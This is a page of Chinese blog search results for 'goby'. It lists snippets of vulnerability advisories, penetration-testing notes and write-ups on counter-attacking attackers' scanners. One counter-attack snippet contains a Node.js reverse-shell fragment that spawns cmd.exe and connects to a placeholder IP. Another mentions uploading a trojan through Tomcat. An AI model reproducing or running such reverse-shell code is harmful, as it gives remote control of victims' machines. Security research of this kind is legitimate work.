goby

百卓Smart管理平台 uploadfile.php 文件上传漏洞【CVE-2024-0939】

百卓Smart管理平台uploadfile.php文件上传漏洞【CVE-2024-0939】一、产品简介二、漏洞概述三、影响范围四、复现环境五、漏洞复现手动复现小龙验证Goby验证免责声明:请勿利用文章内的相关技术从事非法测试
安全攻防赵小龙·2024-02-08 13:32

Goby 漏洞发布|网神SecGate 3600防火墙 sys_export_conf_local_save 文件读取漏洞

漏洞名称:网神SecGate3600防火墙sys_export_conf_local_save文件读取漏洞EnglishName:NetgodSecGate3600Firewallsys_export_conf_local_saveFileReadVulnerabilityCVSScore:8.0影响资产数:738漏洞描述:网神SecGate3600防火墙是基于状态检测包过滤和应用级代理的复合型硬
Gobysec·2024-02-08 00:16

7、应急响应-战中溯源反制&对抗上线&蚁剑&CS&Goby&Sqlmap等安全工具

后门修改反制上线二、Linux溯源反制-SQL注入工具-SQLMAP1、测试反弹编码加密:2、构造注入点页面test.php固定注入参数值,等待攻击者进行注入3、红队攻击者进行注入测试:三、溯源反制-漏洞扫描工具-Goby
++⁠⁠·2024-02-01 09:39

Goby 漏洞发布|Jenkins args4j 文件读取漏洞(CVE-2024-23897)

漏洞名称:Jenkinsargs4j文件读取漏洞(CVE-2024-23897)EnglishName:Jenkinsargs4jfilereadvulnerability(CVE-2024-23897)CVSScore:9.8影响资产数:729753漏洞描述:CloudBeesJenkins(前称HudsonLabs)是美国CloudBees公司的一套基于Java开发的持续集成工具,它主要用于监
Gobysec·2024-01-31 17:04

Goby 利用内存马中的一些技术细节【技术篇】

一、前言投稿在Goby社区的内存马文章已经写了两篇,在第一篇《Shell中的幽灵王者—JAVAWEB内存马【认知篇】》中介绍了JavaWeb内存马技术的历史演变、分类,从认知层面对常见的JavaWeb内存马技术进行了介绍
Gobysec·2024-01-28 05:34

渗透系列:红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记

红日靶场(vulnstack)一超全面详细的渗透测试学习笔记一、环境搭建实验环境拓扑如下:网络配置二、拿下web服务器信息收集扫描端口和网站目录发现主机:第一个IP启用goby,扫描,可以看扫描出了永恒之蓝漏洞
坦笑&&life·2024-01-19 02:57

2021-11-21

andyoudoit.视听说:Allkindsofwordstodescribepeople2,我在本片文章/音频/视频中学到的怦然心动的单词(精读和视听说分别总结)精读:onone'smind(在某人心上,在想着)goby
解志瑶·2024-01-08 02:54

利用蚁剑钓鱼上线CS

(类似GobyGoby也是使用Electron构建客户端软件)关键实现蚁剑在虚拟终端时,页面上出现http/https协议头时会发生转换(字体会变蓝,表示处于超链接的状态),并且这个链接点开时
蚁景网络安全·2024-01-05 00:01

Goby - 新一代安全工具

Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速地从一个验证入口点
book0121·2024-01-03 19:36

简单免杀绕过和利用上线的 GoCS

前言:Goby可以快速准确的扫描资产,并直观呈现出来。同时经过上次EXP计划过后,PoC&EXP也增加了许多。
H_00c8·2023-12-20 04:22

某校园内网渗透测试

、基础信息目标系统是windows,服务层有IIs6.0,Apache-Web-Server,支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6 二、端口开放情况:利用goby
十三年*·2023-12-19 09:54

Goby漏洞更新 | MeterSphere 文件读取漏洞(CVE-2023-25814)

漏洞名称:MeterSphere文件读取漏洞(CVE-2023-25814)EnglishName:MeterSphereFileReadVulnerability(CVE-2023-25814)CVSScore:7.5影响资产数:2552漏洞描述:MeterSphere是一站式开源持续测试平台,涵盖测试跟踪、接口测试、UI测试和性能测试等功能,全面兼容JMeter、Selenium等主流开源标准
Gobysec·2023-12-03 22:32

红队攻防文库文章集锦

再救你一次,不要让欲望击溃你的意志0.红队攻防1.红队实战红队攻防之特殊场景上线cs和msfCVE-2021-42287&CVE-2021-42278域内提权红队攻防之Goby反杀红队攻防实战之钉钉RCE
各家兴·2023-11-26 23:50

Goby 漏洞发布|大华智慧园区综合管理平台 poi 文件上传漏洞

漏洞名称:大华智慧园区综合管理平台poi文件上传漏洞EnglishName:DahuaSmartParkIntegratedManagementPlatformpoifileuploadvulnerabilityCVSScore:9.0影响资产数:7113漏洞描述:大华智慧园区综合管理平台是由大华技术股份有限公司(DahuaTechnology)开发的一款综合管理解决方案。该平台旨在帮助园区管理者
Gobysec·2023-11-25 01:58

Goby 漏洞发布|大华智慧园区综合管理平台 poi 文件上传漏洞

漏洞名称:浙大恩特客户资源管理系统machord_doc.jsp文件上传漏洞EnglishName:Entsoftmachord_doc.jspfileuploadvulnerabilityCVSScore:9.5影响资产数:9707漏洞描述:浙大恩特客户资源管理系统是一款专注于外贸客户资源管理及订单管理产品的管理系统。浙大恩特客户资源管理系统存在安全漏洞,攻击者通过绕过并在machord_doc
Gobysec·2023-11-25 01:58

插件预热 | 且看安全小白如何轻松利用Goby插件快速上分

0×01前言各位师傅们好,首先强调一遍我可没做坏事,我只是想学技术,我有什么坏心思呢回到正题,作为一个初学者,我想和大家分享一下我是如何利用Goby进行刷分的经历。
Gobysec·2023-11-25 01:51

Goby 2.0 | 引擎大升级 · DIY 指纹时代

历时四月,全新引擎升级Goby2.0!久等了,福利抽奖放在最后,希望不辜负大家的等待。
Gobysec·2023-11-25 01:41

Goby内测版1.6.154发布 | 攻防实战版来了

这波给大家的节奏很明显:一把Goby,一把梭。
Gobysec·2023-11-25 01:11

红队攻防之Goby反杀

>Goby在扫描到http://x.x.x.x后,可以看到PHP的版本信息已经变为我们的xss弹窗的p
各家兴·2023-11-25 01:39

插件分享 | 简单免杀绕过和利用上线的 GoCS

前言:Goby可以快速准确的扫描资产,并直观呈现出来。同时经过上次EXP计划过后,PoC&EXP也增加了许多。
Gobysec·2023-11-24 13:43

简单免杀绕过和利用上线的 GoCS

前言:Goby可以快速准确的扫描资产,并直观呈现出来。同时经过上次EXP计划过后,PoC&EXP也增加了许多。
IT老涵·2023-11-24 12:41

如何在Tomcat后台通过文件上传getshell总结(个人学习笔记思路)

1.用空间测绘或者通过Nmap,goby扫描完成资产搜集之后,发现存在tomcat后门发现可能存在通过tomcat后门上传木马获取服务器权限的漏洞URL栏原地址后输入/manager/html弹出用户名密码登录界面默认用户名和密码都为
Drecrewice·2023-11-16 09:01

Elasticsearch未授权访问漏洞

一、Goby的漏洞发现对一个IP进行C段扫描时,发现了一台服务器存在Elasticsearch未授权访问漏洞二、Elasticsearch未授权访问漏洞漏洞描述ElasticSearch是一个基于Lucene
学安全的废物·2023-11-12 13:59

Goby 漏洞发布|用友 U8 Cloud ActionHandlerServlet 远程代码执行漏洞

漏洞名称:用友U8CloudActionHandlerServlet远程代码执行漏洞EnglishName:YonyouU8CloudActionHandlerServletApiDeserializeCodeExecutionVulnerabilityCVSScore:9.8影响资产数:14073漏洞描述:用友U8Cloud是一种基于企业互联网理念设计的云ERP整体解决方案,集成了人力资源、财务
Gobysec·2023-11-11 03:58

Goby 漏洞发布|IP-guard WebServer view.php 远程命令执行漏洞

漏洞名称:IP-guardWebServerview.php远程命令执行漏洞EnglishName:IP-guardWebServerview.phpremotecommandexecutionvulnerabilityCVSScore:9.8影响资产数:12335漏洞描述:IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简
Gobysec·2023-11-11 03:27

应急响应—溯源反制

ID1.5.木马样本1.6.总结2.攻击中反制2.1.定位准确2.2.反制手段2.2.1.钓鱼邮件反制2.2.2.蚁剑反制2.2.2.1.测试XSS漏洞2.2.2.2.RCE漏洞反弹shell2.2.3.goby
剁椒鱼头没剁椒·2023-11-09 08:15

Goby 漏洞发布| Cisco IOS XE ebui_wsma_http 接口权限绕过漏洞(CVE-2023-20198)

漏洞名称:CiscoIOSXEebui_wsma_http接口权限绕过漏洞(CVE-2023-20198)EnglishName:CiscoIOSXEebui_wsma_httpAPIPermissionBypassVulnerability(CVE-2023-20198)CVSScore:10影响资产数:307282漏洞描述:CiscoIOSXE是一个开放灵活的操作系统,针对未来的工作进行了优化
Gobysec·2023-11-04 14:27

Goby 漏洞发布|XXL-JOB accessToken 权限绕过漏洞

漏洞名称:XXL-JOBaccessToken权限绕过漏洞EnglishName:XXL-JOBdefaultaccessTokenPermissionbypassVulnerabilityCVSScore:9.2影响资产数:18489漏洞描述:XXL-JOB是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB存在默认accessToken,攻击者可使用accessTok
Gobysec·2023-11-04 14:27

Goby 漏洞发布|F5 BIG-IP AJP 身份认证绕过漏洞(CVE-2023-46747)

漏洞名称:F5BIG-IPAJP身份认证绕过漏洞(CVE-2023-46747)EnglishName:F5BIG-IPAJPauthenticationbypassvulnerability(CVE-2023-46747)CVSScore:10影响资产数:307282漏洞描述:F5BIG-IP是一种高性能的应用交付控制器(ADC),用于提供负载均衡、应用安全、应用加速和应用智能等功能。F5BIG
Gobysec·2023-11-04 14:57

朔源反制-170-对抗上线CS,Goby,蚁剑,Sqlmap等安全工具

cs反制红队在进行连接后门时候:代码为一句话后门:修改为');该字段意思为:当imgsrc指向的图片不存在时会弹窗1依据此可进行蚁剑上线代码:varnet=require("net"),sh=require("child_process").exec("cmd.exe");varclient=newnet.Socket();client.connect(xx,"xx.xx.xx.xx",funct
My Year 2019·2023-11-03 03:46

Goby反制复现

0x00前言最近复现Goby反制的时候遇到很多坑,记录一下反制过程以及遇到的坑点,还有世界上最强的黑客mux1ng帮我解决了很多问题。
ker宝·2023-11-03 03:46

反制Goby扫描之XSS点击上线

反制Goby扫描之XSS点击上线1.测试环境2.XSS测试3.CS上线最近看到有大佬利用goby漏洞反制攻击者,特意复现下,原理就是通过XSS进行交互,调用Node.js函数exec执行命令,最新版本已经进行了修复
痴人说梦梦中人·2023-11-03 03:15

关于Goby反制上线CS中的各种问题

前言Goby作为新一代网络安全技术,通过为目标建立完整的资产数据库,实现快速的安全应急,日常为广大师傅提供了便捷的渗透体验。
蚁景网络安全·2023-11-03 03:13

Goby 漏洞发布|泛微E-office协同办公系统 download.php 文件 filename 参数文件读取漏洞

漏洞名称:泛微E-office协同办公系统download.php文件filename参数文件读取漏洞EnglishName:maxViewStorageManagerdynamiccontent.properties.xhtmlRCECVSScore:5.0影响资产数:4971漏洞描述:泛微E-office协同办公系统是一款专业的办公软件,是面向小型企业或团队的工作平台。泛微E-office协同
Gobysec·2023-11-02 02:53

xray的使用教程

安装xray文章目录安装xray基本使用goby与xray的联动官网xray.cool安装社区版即可选择你需要的版本,这里以windows版本为例解压后为exe格式,我们以Powershell打开当下文件夹
Acco_30_L·2023-10-31 01:20

技术分享 跨越语言的艺术:Flask Session 伪造

最终,我们在Goby中成功使用跨语言方式实现了
Gobysec·2023-10-24 20:25

技术分享 | 针对蜜罐反制Goby背后的故事

0x01概述近期我们联动FORadar做了一个插件,实现了从企业名称->企业漏洞的全自动检测流程,在做具体实践的时候碰到了两个很有意思的蜜罐,其中一个蜜罐内置了Weblogic漏洞,同时配置有专门针对旧版本Goby
Gobysec·2023-10-24 19:21

Web&操作系统漏洞发现——工具使用总结

0x01网站源码自己开发0x02网站源码使用开源CMS2、可维护Poc0x01pocassist0x02afrog3、APP渗透0x01在BP上添加转发端口0x02Xray进行监听0x03触发数据4、Goby
@Camelus·2023-10-19 02:46

Goby 漏洞发布|JeeSpringCloud uploadFile.jsp 文件上传漏洞

漏洞名称:JeeSpringClouduploadFile.jsp文件上传漏洞EnglishName:JeeSpringClouduploadFile.jspfileuploadvulnerabilityCVSScore:9.8影响资产数:282漏洞描述:JeeSpringCloud是一款免费开源的Java互联网云快速开发平台。JeeSpringCloud访问/static/uploadify/u
Gobysec·2023-10-17 18:02

Goby 漏洞发布|Honeywell PM43 loadfile.lp 文件命令执行漏洞(CVE-2023-3710)

漏洞名称:HoneywellPM43loadfile.lp文件命令执行漏洞(CVE-2023-3710)EnglishName:HoneywellPM43loadfile.lpfilecommandexecutionvulnerability(CVE-2023-3710)CVSScore:9.8影响资产数:96漏洞描述:HoneywellPM43是美国霍尼韦尔(Honeywell)公司的一款打印机
Gobysec·2023-10-17 18:58

四、漏洞发现

目录42、漏洞发现-操作系统之漏洞探针类型利用修复原理一、漏洞扫描工具演示-Goby,Nmap,Nessus(操作)1.goby忍者系统测试2.nmap扫描3.nessus二、漏洞类型区分讲解-权限提升
DDdd...·2023-10-16 23:07

Goby漏洞更新 | NUUO NVR 摄像机 __debugging_center_utils___.php 命令执行漏洞(CVE-2016-5674)

漏洞名称:NUUONVR摄像机debugging_center_utils_.php命令执行漏洞EnglishName:NUUONVRdebugging_center_utils_.phpCommandExecutionCVSScore:7.5影响资产数:10146漏洞描述:NUUONetworkVideoRecorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUONVR视频存储
Gobysec·2023-10-09 14:34

Goby 漏洞发布|深信服下一代防火墙 loadfile.php 文件读取漏洞

漏洞名称:深信服下一代防火墙loadfile.php文件读取漏洞EnglishName:SangforNextGenerationFirewallloadfile.phpfilereadingvulnerabilityCVSScore:7.5影响资产数:281045漏洞描述:深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在loadfile.php处存在文件读
Gobysec·2023-10-07 22:03

Goby资产扫描工具安装及报错处理

官网:https://cn.gobies.org/index.html产品介绍:帮企业梳理资产暴露攻击面,新一代网络安全技术,通过为目标建立完整的资产数据库,实现快速的安全应急。已有功能:扫描资产扫描端口扫描协议识别产品识别WebFinder漏洞扫描网站截图代理扫描域名扫描深度测试CS架构漏洞自定义PoC自定义字典漏洞利用远程会话报告数据统计及分析导出报告功能详细图文介绍,请官网查看:https:
Young先生·2023-10-07 11:53

Goby 漏洞发布|Cockpit 平台 upload 文件上传漏洞(CVE-2023-1313)

漏洞名称:Cockpit平台upload文件上传漏洞(CVE-2023-1313)EnglishName:CockpitFileUploadVulnerability(CVE-2023-1313)CVSScore:7.2影响资产数:3185漏洞描述:Cockpit是一个自托管、灵活且用户友好的无头内容平台,用于创建自定义数字体验。Cockpit存在文件上传漏洞,攻击者可上传任意文件,进而导致服务器
Gobysec·2023-09-28 22:27

Goby 漏洞发布|泛微 E-office flow_xml.php 文件 SORT_ID 参数 SQL 注入漏洞

漏洞名称:泛微E-officeflow_xml.php文件SORT_ID参数SQL注入漏洞EnglishName:WeaverE-officeflow_xml.phpfileSORT_IDparameterSQLinjectionvulnerabilityCVSScore:7.8影响资产数:21632漏洞描述:泛微E-Office是面向中小型组织推出的OA产品,由泛微网络科技股份有限公司开发。泛微
Gobysec·2023-09-24 10:08

Goby 漏洞发布|Junos webauth_operation.php 文件上传漏洞(CVE-2023-36844)

漏洞名称:Junoswebauth_operation.php文件上传漏洞(CVE-2023-36844)EnglishName:Junoswebauth_operation.phpFileUploadVulnerability(CVE-2023-36844)CVSScore:9.8影响资产数:47518漏洞描述:Junos是JuniperNetworks生产的一款可靠的高性能网络操作系统。攻击者
Gobysec·2023-09-24 10:38

Goby 漏洞发布|管家婆订货易在线商城 SelectImage.aspx 文件上传漏洞

漏洞名称:管家婆订货易在线商城SelectImage.aspx文件上传漏洞EnglishName:GJPSelectImage.aspxfileuploadvulnerabilityCVSScore:9.8影响资产数:2617漏洞描述:任我行率先针对中小企业推出了管家婆进销存、财务一体化软件。管家婆订货易在线商城存在SelectImage.aspx任意文件上传漏洞,攻击者可通过该漏洞可控制整个系统
Gobysec·2023-09-24 10:38

Goby 漏洞发布|Revive Adserver 广告管理系统 adxmlrpc.php 文件远程代码执行漏洞(CVE-2019-5434)

漏洞名称:ReviveAdserver广告管理系统adxmlrpc.php文件远程代码执行漏洞(CVE-2019-5434)EnglishName:ReviveAdserveradxmlrpc.phpRemoteCodeExecutionVulnerability(CVE-2019-5434)CVSScore:9.0影响资产数:5667漏洞描述:ReviveAdserver是ReviveAdser
Gobysec·2023-09-24 10:06

《Web安全基础》08. 漏洞发现

1:漏洞发现1.1:操作系统相关资料:Goby官网:https://gobysec.nethttps://gobies.orgGoby
镜坛主·2023-09-21 20:45
上一页 1 2 3 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他